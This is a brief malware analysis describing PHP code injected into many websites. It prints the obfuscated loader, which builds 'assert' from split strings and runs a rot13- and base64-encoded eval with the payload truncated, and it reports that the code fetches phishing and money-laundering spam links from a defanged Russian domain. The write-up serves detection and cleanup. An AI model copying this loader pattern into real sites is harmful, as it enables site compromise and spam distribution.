We see quite a few sites with the following injected PHP code:
//###=CACHE START=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXF...skipped...Tyvqwg9"));'));
//###=CACHE END=###
This malware contacts dfoiqweomxa[.]ru and fetches spam links from there. The spam mainly promotes Russian phishing and money laundering sites. Infected sites can be found all around the world. We found this spam even on sites of American and international universities.